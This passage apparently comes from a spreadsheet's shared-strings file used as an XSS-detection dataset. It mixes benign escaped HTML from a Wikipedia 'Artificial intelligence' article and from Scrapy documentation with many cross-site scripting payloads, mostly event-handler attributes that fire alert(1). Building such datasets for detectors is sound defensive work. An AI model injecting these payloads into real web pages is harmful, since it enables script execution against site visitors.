    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Scientific+American&amp;amp;rft.atitle=What+is+%27fuzzy+logic%27%3F+Are+there+computers+that+are+inherently+fuzzy+and+do+not+apply+the+usual+binary+logic%3F&amp;amp;rft_id=https%3A%2F%2Fwww.scientificamerican.com%2Farticle%2Fwhat-is-fuzzy-logic-are-t%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;code id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLakoffNúñez2000" class="citation book"&gt;&lt;a href="/wiki/George_Lakoff" title="George Lakoff"&gt;Lakoff, George &lt;/a&gt;; &lt;a href="/wiki/Rafael_E._N%C3%BA%C3%B1ez" title="Rafael E. Núñez"&gt;Núñez, Rafael E. &lt;/a&gt; (2000). &lt;a href="/wiki/Where_Mathematics_Comes_From" title="Where Mathematics Comes From"&gt;&lt;i&gt;Where Mathematics Comes From: How the Embodied Mind Brings Mathematics into Being &lt;/i&gt; &lt;/a&gt;. Basic Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-465-03771-1" title="Special:BookSources/978-0-465-03771-1"&gt;&lt;bdi&gt;978-0-465-03771-1 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Where+Mathematics+Comes+From%3A+How+the+Embodied+Mind+Brings+Mathematics+into+Being&amp;amp;rft.pub=Basic+Books&amp;amp;rft.date=2000&amp;amp;rft.isbn=978-0-465-03771-1&amp;amp;rft.aulast=Lakoff&amp;amp;rft.aufirst=George&amp;amp;rft.au=N%C3%BA%C3%B1ez%2C+Rafael+E.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ruby onpointerover=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;header onbeforecut="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;base style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onmousemove="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;main id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/main&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Backpropagation" title="Backpropagation"&gt;Backpropagation &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;button id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onbeforecopy="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;slot onmouseup="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>First &lt;a href="/wiki/AI_Winter" class="mw-redirect" title="AI Winter"&gt;AI Winter &lt;/a&gt;, &lt;a href="/wiki/Mansfield_Amendment" class="mw-redirect" title="Mansfield Amendment"&gt;Mansfield Amendment &lt;/a&gt;, &lt;a href="/wiki/Lighthill_report" title="Lighthill report"&gt;Lighthill report &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;header draggable="true" ondragend="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-306"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-306"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Inspect a running crawler using a built-in Python console.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onpointerleave=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onmousemove="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;strike onclick="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHawkinsBlakeslee2005" class="citation book"&gt;&lt;a href="/wiki/Jeff_Hawkins" title="Jeff Hawkins"&gt;Hawkins, Jeff &lt;/a&gt;; Blakeslee, Sandra (2005). &lt;a href="/wiki/On_Intelligence" title="On Intelligence"&gt;&lt;i&gt;On Intelligence &lt;/i&gt; &lt;/a&gt;. New York, NY: Owl Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-8050-7853-4" title="Special:BookSources/978-0-8050-7853-4"&gt;&lt;bdi&gt;978-0-8050-7853-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=On+Intelligence&amp;amp;rft.place=New+York%2C+NY&amp;amp;rft.pub=Owl+Books&amp;amp;rft.date=2005&amp;amp;rft.isbn=978-0-8050-7853-4&amp;amp;rft.aulast=Hawkins&amp;amp;rft.aufirst=Jeff&amp;amp;rft.au=Blakeslee%2C+Sandra&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;script onkeyup="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointerup=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;nobr id=x tabindex=1 onfocus=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;i draggable="true" ondragleave="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmouseout="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>!function(){var analytics=window.analytics=window.analytics||[];if(!analytics.initialize)if(analytics.invoked)window.console&amp;&amp;console.error&amp;&amp;console.error("Segment snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","page","once","off","on"];analytics.factory=function(t){return function(){var e=Array.prototype.slice.call(arguments);e.unshift(t);analytics.push(e);return analytics}};for(var t=0;t&lt;analytics.methods.length;t++){var e=analytics.methods[t];analytics[e]=analytics.factory(e)}analytics.load=function(t){var e=document.createElement("script");e.type="text/javascript";e.async=!0;e.src=("https:"===document.location.protocol?"https://":"http://")+"cdn.segment.com/analytics.js/v1/"+t+"/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(e,n)};analytics.SNIPPET_VERSION="3.1.0";</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;blink id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Planning-110"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Planning_110-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Frey, Carl Benedikt; Osborne, Michael A (1 January 2017). "The future of employment: How susceptible are jobs to computerisation?". &lt;i&gt;Technological Forecasting and Social Change &lt;/i&gt;. &lt;b&gt;114 &lt;/b&gt;: 254–280. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.395.416"&gt;10.1.1.395.416 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;table onkeypress="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointerleave=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Lindenbaum, M., Markovitch, S., &amp;amp; Rusakov, D. (2004). Selective sampling for nearest neighbor classifiers. Machine learning, 54(2), 125–152. </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/debug.html"&gt;Debugging Spiders&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay onloadedmetadata=alert(1)&gt; &lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;isindex oncontextmenu="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1162%2Fneco.1992.4.2.234"&gt;10.1162/neco.1992.4.2.234 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Neural+Computation&amp;amp;rft.atitle=Learning+complex%2C+extended+sequences+using+the+principle+of+history+compression&amp;amp;rft.volume=4&amp;amp;rft.issue=2&amp;amp;rft.pages=234-242&amp;amp;rft.date=1992&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.49.3934&amp;amp;rft_id=info%3Adoi%2F10.1162%2Fneco.1992.4.2.234&amp;amp;rft.aulast=Schmidhuber&amp;amp;rft.aufirst=J.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;aside onbeforecopy="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;footer id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;title id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/title&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;section onkeypress="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;html onmousedown="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onmousedown="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/History_of_artificial_intelligence" title="History of artificial intelligence"&gt;History of artificial intelligence &lt;/a&gt; and &lt;a href="/wiki/Timeline_of_artificial_intelligence" title="Timeline of artificial intelligence"&gt;Timeline of artificial intelligence &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;form id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup id=x tabindex=1 onactivate=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay onloadedmetadata=alert(1)&gt; &lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;iframe oncopy="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;main draggable="true" ondragend="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup ondblclick="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;u onload=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;content onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/content&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;424–433, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;u onkeypress="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/Evolutionary_computation" title="Evolutionary computation"&gt;Evolutionary computation &lt;/a&gt; uses a form of optimization search. For example, they may begin with a population of organisms (the guesses) and then allow them to mutate and recombine, &lt;a href="/wiki/Artificial_selection" class="mw-redirect" title="Artificial selection"&gt;selecting &lt;/a&gt; only the fittest to survive each generation (refining the guesses). Classic &lt;a href="/wiki/Evolutionary_algorithms" class="mw-redirect" title="Evolutionary algorithms"&gt;evolutionary algorithms &lt;/a&gt; include &lt;a href="/wiki/Genetic_algorithms" class="mw-redirect" title="Genetic algorithms"&gt;genetic algorithms &lt;/a&gt;, &lt;a href="/wiki/Gene_expression_programming" title="Gene expression programming"&gt;gene expression programming &lt;/a&gt;, and &lt;a href="/wiki/Genetic_programming" title="Genetic programming"&gt;genetic programming &lt;/a&gt;.&lt;sup id="cite_ref-Genetic_programming_191-0" class="reference"&gt;&lt;a href="#cite_note-Genetic_programming-191"&gt;&amp;#91;187&amp;#93; &lt;/a&gt; &lt;/sup&gt; Alternatively, distributed search processes can coordinate via &lt;a href="/wiki/Swarm_intelligence" title="Swarm intelligence"&gt;swarm intelligence &lt;/a&gt; algorithms. Two popular swarm algorithms used in search are &lt;a href="/wiki/Particle_swarm_optimization" title="Particle swarm optimization"&gt;particle swarm optimization &lt;/a&gt; (inspired by bird &lt;a href="/wiki/Flocking_(behavior)" title="Flocking (behavior)"&gt;flocking &lt;/a&gt;) and &lt;a href="/wiki/Ant_colony_optimization" class="mw-redirect" title="Ant colony optimization"&gt;ant colony optimization &lt;/a&gt; (inspired by &lt;a href="/wiki/Ant_trail" class="mw-redirect" title="Ant trail"&gt;ant trails &lt;/a&gt;).&lt;sup id="cite_ref-Society_based_learning_192-0" class="reference"&gt;&lt;a href="#cite_note-Society_based_learning-192"&gt;&amp;#91;188&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-193" class="reference"&gt;&lt;a href="#cite_note-193"&gt;&amp;#91;189&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onkeypress="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.mckinsey.com/business-functions/mckinsey-digital/our-insights/advanced-analytics-in-hospitality"&gt;"Advanced analytics in hospitality" &lt;/a&gt;. &lt;i&gt;McKinsey &amp;amp; Company &lt;/i&gt;. 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;14 January </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Erich_von_Holst" title="Erich von Holst"&gt;Erich von Holst &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=www.igmchicago.org&amp;amp;rft.atitle=Robots+and+Artificial+Intelligence&amp;amp;rft_id=http%3A%2F%2Fwww.igmchicago.org%2Fsurveys%2Frobots-and-artificial-intelligence&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-277"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-277"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;figure oncut="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Introspection" title="Introspection"&gt;Introspection &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Personality_computing" title="Personality computing"&gt;Personality computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointerdown=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;shadow draggable="true" ondragend="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpaste="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;time draggable="true" ondragend="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmousemove="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>Background:</t>
  </si>
  <si>
    <t>&lt;small onpointerenter=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;svg onunload=window.open('javascript:alert(1)')&gt;</t>
  </si>
  <si>
    <t>&lt;dl draggable="true" ondragenter="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/History_and_philosophy_of_science" title="History and philosophy of science"&gt;History and philosophy of science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;small id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/small&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;i&gt;&lt;a href="/wiki/Physical_symbol_system" title="Physical symbol system"&gt;Newell and Simon's physical symbol system hypothesis &lt;/a&gt; &lt;/i&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;video oncut="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Feminist_method" title="Feminist method"&gt;Feminist method &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;span id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;footer onkeyup="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;col id=x tabindex=1 onfocus=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onpointerdown=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 18.2 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;acronym draggable="true" ondragend="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;300–301, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;s onpointerout=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Fast+Company&amp;amp;rft.atitle=Elon+Musk+Is+Donating+%2410M+Of+His+Own+Money+To+Artificial+Intelligence+Research&amp;amp;rft.date=2015-01-15&amp;amp;rft_id=http%3A%2F%2Fwww.fastcompany.com%2F3041007%2Ffast-feed%2Felon-musk-is-donating-10m-of-his-own-money-to-artificial-intelligence-research&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;noembed ondrop=alert(1) contenteditable&gt;drop here&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;rt id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;sup oncontextmenu="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;tr onkeyup="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpaste=alert(1) autofocus&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;br id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/br&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;table id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/table&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Knowledge_revolution-165"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Knowledge_revolution_165-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;image oncut="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/code&gt;&lt;/a&gt;-powered libraries.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/cs.CL"&gt;cs.CL &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Deep+Speech%3A+Scaling+up+end-to-end+speech+recognition&amp;amp;rft.date=2014&amp;amp;rft_id=info%3Aarxiv%2F1412.5567&amp;amp;rft.aulast=Hannun&amp;amp;rft.aufirst=Awni&amp;amp;rft.au=Case%2C+Carl&amp;amp;rft.au=Casper%2C+Jared&amp;amp;rft.au=Catanzaro%2C+Bryan&amp;amp;rft.au=Diamos%2C+Greg&amp;amp;rft.au=Elsen%2C+Erich&amp;amp;rft.au=Prenger%2C+Ryan&amp;amp;rft.au=Satheesh%2C+Sanjeev&amp;amp;rft.au=Sengupta%2C+Shubho&amp;amp;rft.au=Coates%2C+Adam&amp;amp;rft.au=Ng%2C+Andrew+Y.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div id="mw-panel"&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;small onload=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onblur=alert(1) tabindex=1 id=x&gt;&lt;/spacer&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onmouseup="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;footer onmouseout="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mixed_reality" title="Mixed reality"&gt;Mixed reality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;font style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmouseout="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpointerup=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Metaphysics" title="Metaphysics"&gt;Metaphysics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;source onpaste="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;q onpointerover=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onmousemove="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;cite ondrop=alert(1) contenteditable&gt;drop here&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;address id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/address&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;legend onbeforecut="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;details onmouseenter="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;tr oncopy="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;sub id=x tabindex=1 onfocus=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointerenter=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;noembed style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;pre draggable="true" ondragstart="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;rp id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;details oncut="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;thead onbeforecut="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;caption draggable="true" ondragleave="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onkeydown="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;em id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/em&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt; &lt;?import namespace="t" implementation="#default#time2"&gt; &lt;t:set attributeName="innerHTML" to="&lt;SCRIPT DEFER&gt;alert("")&lt;/SCRIPT&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpointermove=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Ford, Martin; Colvin, Geoff (6 September 2015). &lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/technology/2015/sep/06/will-robots-create-destroy-jobs"&gt;"Will robots create more jobs than they destroy?" &lt;/a&gt;. &lt;i&gt;The Guardian &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;13 January </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Markov_decision_process-214"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Markov_decision_process_214-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;menuitem draggable="true" ondragenter="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmouseout="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;output id=x tabindex=1 onactivate=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Decision_theory" title="Decision theory"&gt;decision theory &lt;/a&gt; and &lt;a href="/wiki/Decision_analysis" title="Decision analysis"&gt;decision analysis &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;track onmouseout="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;363−365 &lt;/li&gt;</t>
  </si>
  <si>
